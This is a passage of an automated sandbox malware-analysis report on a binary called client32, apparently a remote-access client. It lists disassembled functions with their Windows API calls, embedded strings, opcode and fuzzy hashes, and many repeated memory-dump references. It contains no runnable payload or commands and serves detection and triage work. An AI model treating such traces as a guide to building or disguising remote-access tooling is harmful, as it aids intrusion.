                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$HeapInfoModuleVersion_free$AllocateErrorFreeHandleLastNameQuerySizeValue_malloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1929493397-0
                                                                                                                                                                • Opcode ID: 9489115f83366b84713dec6f38027bb45098fbbfec03c1f8b99d396b43aa2c76
                                                                                                                                                                • Instruction ID: 787f17739b52c563a3d9ec57c4c9c5daab7db3240080945e734cf0a5696ebb7d
                                                                                                                                                                • Opcode Fuzzy Hash: 9489115f83366b84713dec6f38027bb45098fbbfec03c1f8b99d396b43aa2c76
                                                                                                                                                                • Instruction Fuzzy Hash: 6B2182B69041299BCB14DFA4DC85EDAF3BCEF58315F0041A9E94997200DAB1AA94CFA1
                                                                                                                                                                Function 110EF410 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111314C6,00000000,?), ref: 110EF428
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111314C6,00000000,?), ref: 110EF43D
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF45F
                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 110EF46C
                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF47B
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF48B
                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 110EF4A5
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 110EF4AC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3489003387-0
                                                                                                                                                                • Opcode ID: f305f70b0a508e017892b62e48371e8b3f43a3e7fc194d7e2774851c331f3d00
                                                                                                                                                                • Instruction ID: e8da65f3efd13e976dd0653e531999b36ad0d787b84e76d6cd3085f044a28b2e
                                                                                                                                                                • Opcode Fuzzy Hash: f305f70b0a508e017892b62e48371e8b3f43a3e7fc194d7e2774851c331f3d00
                                                                                                                                                                • Instruction Fuzzy Hash: 9F21B676A11019AFD706DFA5D889AFFF7BCEB84319F0100AEF91993180DF609905C7A2
                                                                                                                                                                Function 110896A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11088970: IsWindow.USER32(?), ref: 1108898F
                                                                                                                                                                  • Part of subcall function 11088970: IsWindow.USER32(?), ref: 1108899D
                                                                                                                                                                • GetParent.USER32(00000000), ref: 110896E6
                                                                                                                                                                • GetParent.USER32(00000000), ref: 110896F7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ParentWindow
                                                                                                                                                                • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                                                                                                                • API String ID: 3530579756-3361795001
                                                                                                                                                                • Opcode ID: 9709288e38ba78ad4448361af59d9b822e1e5d3bd5bb4326ef2a28d0a396b285
                                                                                                                                                                • Instruction ID: 8efe40e2fdda8b1370fb50fea0ad5bb7b492340fab8297e239ca8774ad0a57fe
                                                                                                                                                                • Opcode Fuzzy Hash: 9709288e38ba78ad4448361af59d9b822e1e5d3bd5bb4326ef2a28d0a396b285
                                                                                                                                                                • Instruction Fuzzy Hash: B2712A74E1825AEFDB11EF649C81FDEB7FCAF88708F0040A5E94597241FA71A944CBA1
                                                                                                                                                                Function 110573B0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 188libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(111ED708,59FD48C0,1110EDDD,00000000,00000000,00000000,E8111B5E,111825D3,000000FF,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000), ref: 1107602E
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(0000000C,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 11076097
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(00000024,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000,1118A168,000000FF), ref: 1107609D
                                                                                                                                                                  • Part of subcall function 11075FE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000), ref: 110760A7
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004D0,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000), ref: 110760FC
                                                                                                                                                                  • Part of subcall function 11075FE0: InitializeCriticalSection.KERNEL32(000004F8,?,1110E49D,0003750B,A8680D75,E8111B5E,00000001,00000000,59FD48C0,00000000,00000001,00000000,00000000), ref: 11076105
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1105759C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 110575E1
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110575F4
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 110575FF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CritiusernitializeSection$Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                                                                                                • String ID: Kernel32.dll$WTSGetActiveConsoleSessionId
                                                                                                                                                                • API String ID: 3780373956-3165951319
                                                                                                                                                                • Opcode ID: 53057ca7014f2598cfe3f9c75758400a00b16893141128018dff47bec75b6422
                                                                                                                                                                • Instruction ID: 5b2845002196474fabc536bb645ff26533f5159a1a467828fb1dae30e08bae14
                                                                                                                                                                • Opcode Fuzzy Hash: 53057ca7014f2598cfe3f9c75758400a00b16893141128018dff47bec75b6422
                                                                                                                                                                • Instruction Fuzzy Hash: C47149B4A01215AFDB10CFAAC8C0E9AFBF9FF88314F24819AE91597314D771A941CF64
                                                                                                                                                                Function 11071500 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,59FD48C0,76967CB0,76967AA0,?,76967CB0,76967AA0), ref: 11071554
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 11071568
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110716E1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                                                                                                                • API String ID: 624642848-3840833929
                                                                                                                                                                • Opcode ID: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                                                                                                • Instruction ID: f6d3c874c1d1c48a5cbc4b1d223e4c094ec3a892b4c0f1e6412567ed65325da8
                                                                                                                                                                • Opcode Fuzzy Hash: 0c8d2ced26a2bd08ab4c29fa8ca54adca0efbc1028afe9b50eb6db0bcfa7742a
                                                                                                                                                                • Instruction Fuzzy Hash: F061C775E04285DFD715CF68C480FAABBF6FB08318F0985A9E8968B2C1D774E944CB94
                                                                                                                                                                Function 1101F490 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1101F501
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F615
                                                                                                                                                                • GetSaveFileNameA.COMDLG32(?), ref: 1101F637
                                                                                                                                                                • _fputs.LIBCMT ref: 1101F663
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                                                                                • String ID: ChatPath$X
                                                                                                                                                                • API String ID: 2661292734-3955712077
                                                                                                                                                                • Opcode ID: db4f3b619d315f2bbf7e3485c087bbc2770cef59e8a98ff41368cab619112884
                                                                                                                                                                • Instruction ID: a33b43f520b97c5360942022e582a7bde0abed0a0bd5764f507ed7251157f071
                                                                                                                                                                • Opcode Fuzzy Hash: db4f3b619d315f2bbf7e3485c087bbc2770cef59e8a98ff41368cab619112884
                                                                                                                                                                • Instruction Fuzzy Hash: DB51B574D04329AFDB20DF60CC48B9EBBB4AF45708F0046D9D9096B290EB75EA44CF91
                                                                                                                                                                Function 11071740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113windowtimeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                                                                  • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                                                                  • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                                                                  • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                                                                                  • Part of subcall function 11071500: EnterCriticalSection.KERNEL32(?,59FD48C0,76967CB0,76967AA0,?,76967CB0,76967AA0), ref: 11071554
                                                                                                                                                                  • Part of subcall function 11071500: LeaveCriticalSection.KERNEL32(?), ref: 11071568
                                                                                                                                                                  • Part of subcall function 11071500: LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110716E1
                                                                                                                                                                  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                • SetTimer.USER32(00000000,00000000,000000FA,00000000), ref: 110717C9
                                                                                                                                                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110717D9
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110717E7
                                                                                                                                                                  • Part of subcall function 1110FC10: EnterCriticalSection.KERNEL32(00000010,00000000,757323A0,1100BE4B), ref: 1110FC18
                                                                                                                                                                  • Part of subcall function 1110FC10: LeaveCriticalSection.KERNEL32(00000010), ref: 1110FC25
                                                                                                                                                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 11071822
                                                                                                                                                                  • Part of subcall function 1110FC10: LeaveCriticalSection.KERNEL32(00000010,?), ref: 1110FC60
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterMessage$EventInitialize$CreateCurrentDispatchThreadTimer
                                                                                                                                                                • String ID: Receive$uj
                                                                                                                                                                • API String ID: 450530131-2059908200
                                                                                                                                                                • Opcode ID: 2fa3a773f6bc917990c13475068b23d20034799599438ba5b562ac3510b02e30
                                                                                                                                                                • Instruction ID: 016ae389b66accaab653c5318acd7ac0fe13e28cef998fca003f328108609293
                                                                                                                                                                • Opcode Fuzzy Hash: 2fa3a773f6bc917990c13475068b23d20034799599438ba5b562ac3510b02e30
                                                                                                                                                                • Instruction Fuzzy Hash: 06318575B50316ABEB18DBA1CC42FFEB379FB44B14F404528E621AA1C0EBB4B504C7A5
                                                                                                                                                                Function 11093180 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110CEC60: CreateDialogParamA.USER32(00000000,?,1112D7C9,110CBCD0,00000000), ref: 110CECF1
                                                                                                                                                                  • Part of subcall function 110CEC60: GetLastError.KERNEL32 ref: 110CEE49
                                                                                                                                                                  • Part of subcall function 110CEC60: wsprintfA.USER32 ref: 110CEE78
                                                                                                                                                                  • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                                                                                                  • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 110931C9
                                                                                                                                                                • SetWindowLongA.USER32(?,000000EC,00000000), ref: 110931F7
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 11093220
                                                                                                                                                                • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109324E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 3136964118-2830328467
                                                                                                                                                                • Opcode ID: fb6c2165198b052ed1adde41c8e51930884ee91b5ce78e92da16114a67f0499d
                                                                                                                                                                • Instruction ID: 17cdb21e99cc57644c55c5a770e75091ec79e40792fa9a2895745f392d232910
